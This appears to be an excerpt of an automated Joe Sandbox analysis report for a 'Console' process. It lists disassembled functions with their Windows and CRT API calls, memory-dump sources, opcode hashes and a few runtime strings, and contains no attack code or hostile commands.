                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$CloseCreateErrorHandleLastThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4096589887-0
                                                                                                                                                                                                                          • Opcode ID: 83de8382fa50057e29d493dccdf0345c2843c4728c3b8326fbfa321003d15b95
                                                                                                                                                                                                                          • Instruction ID: 12a66ed1796de2454fff2f9e06ccade5bfd35d9e3cc0b7bb3a73b8bbe0cfcc0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83de8382fa50057e29d493dccdf0345c2843c4728c3b8326fbfa321003d15b95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B551DB71A00646CFEB25CFADD8487AEBBB5FB81B24F10025ED824A33D5D7359900CB90
                                                                                                                                                                                                                          Function 01229250 Relevance: 7.6, APIs: 5, Instructions: 133registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000,7CAB6A82,?), ref: 012292E1
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 012293C1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 47109696-0
                                                                                                                                                                                                                          • Opcode ID: dd6de4d408e84bab5b0639052562f19e15fe2d394e7d1cd05669b7e35c34ce9e
                                                                                                                                                                                                                          • Instruction ID: 73786c45b1e2ab8cb5d58b6244ee7ca8b0927c79092972f2c2e16b199ca5bdb4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6de4d408e84bab5b0639052562f19e15fe2d394e7d1cd05669b7e35c34ce9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD416071A10229ABEF24CF98CD05BAEBBB8FB44718F104169E910B73D0D77A5D448BA4
                                                                                                                                                                                                                          Function 012D8460 Relevance: 7.6, APIs: 6, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,012D87A9,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 012D8498
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 012D84A8
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,012D87A9,000000FF,00000000,00000000), ref: 012D84C3
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D84D2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012D8585
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 012D8593
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$FreeHeapmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3875093398-0
                                                                                                                                                                                                                          • Opcode ID: 96c979be654c3a54622bc32ce576b50d5fa6345da526efd738b8acc49930ff2a
                                                                                                                                                                                                                          • Instruction ID: 7292db3dcfcdec64e6bd5c666b5a9ad678c986c632f00c43d42bcc4b1e68b9e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96c979be654c3a54622bc32ce576b50d5fa6345da526efd738b8acc49930ff2a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E741E671D1021AABDB20DF68DC40AEFB7B8FF54310F45462DE915B7254EB319904CBA1
                                                                                                                                                                                                                          Function 012D18F0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 127memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012CD160: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,012CDA2F,7CAB6A82,?,00000000), ref: 012CD165
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,00000000,00000004,00000000), ref: 012D1907
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012CE6CE), ref: 012D1915
                                                                                                                                                                                                                            • Part of subcall function 012D1E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,016445B0,00000000,012D1C78,00000000,00000000,00000000,00000000,00000000), ref: 012D1E5B
                                                                                                                                                                                                                            • Part of subcall function 012D1E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,016445B0,00000000,012D1C78,00000000,00000000,00000000,00000000,00000000), ref: 012D1E6C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000), ref: 012D1992
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,03C71C90,?,?,?,?,?,?,?,?,?,?,?,?,?,012CE6CE), ref: 012D19E3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-DotNETCore-EventPipeConfiguration, xrefs: 012D1952
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$malloc$FreeHeap
                                                                                                                                                                                                                          • String ID: Microsoft-DotNETCore-EventPipeConfiguration
                                                                                                                                                                                                                          • API String ID: 2120179596-2204440910
                                                                                                                                                                                                                          • Opcode ID: 9c9ed72579f453deaac0a7224c890f58c22817cb3fcfd49a312103d25a9309c6
                                                                                                                                                                                                                          • Instruction ID: a698f2eb0d2daf8e86f418631f1c69157d869e14a899b21c4823450667dbf6f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c9ed72579f453deaac0a7224c890f58c22817cb3fcfd49a312103d25a9309c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A41D6706202039BEB14AFA4DC51B7ABBE5BF90644F00452CD7469BB91EB71D825C791
                                                                                                                                                                                                                          Function 012256B0 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(000001FF,00000003,00000000,00000002,00000002,?,00000002,?,01225887,00000002,?), ref: 01225724
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 01225754
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0122575F
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0122576A
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 01225775
                                                                                                                                                                                                                            • Part of subcall function 010973F0: __stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000200,00000002,00000000,00000002,?,0122574D,000000FF,00000200,?,00000002,?,00000002), ref: 0109740D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$__stdio_common_vsnprintf_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2452351950-0
                                                                                                                                                                                                                          • Opcode ID: 03825f2d00b201a5657f224f93a8a40ad0175919c92c1ef871f3dcf7a686d9f1
                                                                                                                                                                                                                          • Instruction ID: e849818e6008b1218c3250f92e1755d253e0c5a3147d982317016b5927838ab5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03825f2d00b201a5657f224f93a8a40ad0175919c92c1ef871f3dcf7a686d9f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2314832260205FFDB299F59DC04BBD779AEF95361F14C118FA1AC72A4EA31A840CB24
                                                                                                                                                                                                                          Function 0122C790 Relevance: 7.6, APIs: 5, Instructions: 100processmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,7CAB6A82,?,0150E144,00000000,000000FF), ref: 0122C80C
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,0150E144,00000000,00000000,?,?,?,0150E144,00000000,000000FF), ref: 0122C85C
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0122C864
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0122C881
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0122C892
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateFreeHeapProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 503317581-0
                                                                                                                                                                                                                          • Opcode ID: a6e34e1f83580e45c69348441811333d9437dc8e71e3f05e2d712a98d926e498
                                                                                                                                                                                                                          • Instruction ID: 6e259cfb83bcd7054c6fe03e7426c98535f050852da6249413d1919bb2b2e7ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6e34e1f83580e45c69348441811333d9437dc8e71e3f05e2d712a98d926e498
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5531AF76A00205AFDB20CFA9DD49BAEBBF8EB48721F11426EE915E73D0D77159108B90
                                                                                                                                                                                                                          Function 010D88A0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 010D88E4
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D88F1
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000114,000000FF,00000000,00000000,00000000,00000000), ref: 010D8912
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D891D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$FreeHeapfreemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 354066558-0
                                                                                                                                                                                                                          • Opcode ID: 4c674a90e07d8c2040db29758bf121ef824a6b6b140d79580367c0fbe86a9c3d
                                                                                                                                                                                                                          • Instruction ID: b9e091a1a4377e761c4b9eff70bf6ae9088f6f627695c0c0b3c5a5e0577b7032
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c674a90e07d8c2040db29758bf121ef824a6b6b140d79580367c0fbe86a9c3d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5121F67270031137D6309A696C05F2BFA989B90A71F15463AFE04EB3D0E961E82042A5
                                                                                                                                                                                                                          Function 014782E0 Relevance: 7.6, APIs: 5, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,00000000,00000000,?,01466253,?,00000011,00000004), ref: 0147830D
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,?,?,01466253,?,00000011,00000004), ref: 01478316
                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,01466253,?,00000011,00000004), ref: 01478323
                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,?,01466253,?,00000011,00000004), ref: 01478335
                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,?,01466253,?,00000011,00000004), ref: 0147833E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EncodePointer$Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3053055170-0
                                                                                                                                                                                                                          • Opcode ID: fefd4077116117f9ea950fa9ed9b209af685c7ad21ea890a70d545aa5491153e
                                                                                                                                                                                                                          • Instruction ID: cdcdb3951769c236bbb90b0794d245811423e027661e582223d70077024de7a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fefd4077116117f9ea950fa9ed9b209af685c7ad21ea890a70d545aa5491153e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 150188762006129F97204F7D994C5DBBBA9FBC46223164A2AFA15E3374E73294118761
                                                                                                                                                                                                                          Function 01252890 Relevance: 7.5, APIs: 5, Instructions: 32pipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,00000000,012D732D,00000014,?), ref: 012528A0
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?), ref: 012528AF
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 012528B8
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,012D732D,00000014,?), ref: 012528CE
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,012D732D,00000014,?), ref: 012528FC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$BuffersDisconnectFileFlushNamedPipefree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4191446590-0
                                                                                                                                                                                                                          • Opcode ID: f1cc6a39a4688749fcb42ff345ca292b50c3d8d0943d3c04c8b9b40def4fbab9
                                                                                                                                                                                                                          • Instruction ID: e42752b2dd592f9d57e430e6e0ec85bbde5520ddaf3b284a882b0b66c2d6d294
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1cc6a39a4688749fcb42ff345ca292b50c3d8d0943d3c04c8b9b40def4fbab9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6001F670000B11CBD7308F69D84C746BBB5BF05326F114B1CE5B6A6AF4D775A4598B90
                                                                                                                                                                                                                          Function 010C0060 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 334memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • AMP Budget: pressure=%llu ? budget=%llu (total_added=%llu, total_removed=%llu, mng_heap=%llu) pos=%d, xrefs: 010C04F1
                                                                                                                                                                                                                          • AMP Add: %llu => added=%llu total_added=%llu total_removed=%llu, xrefs: 010C019D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
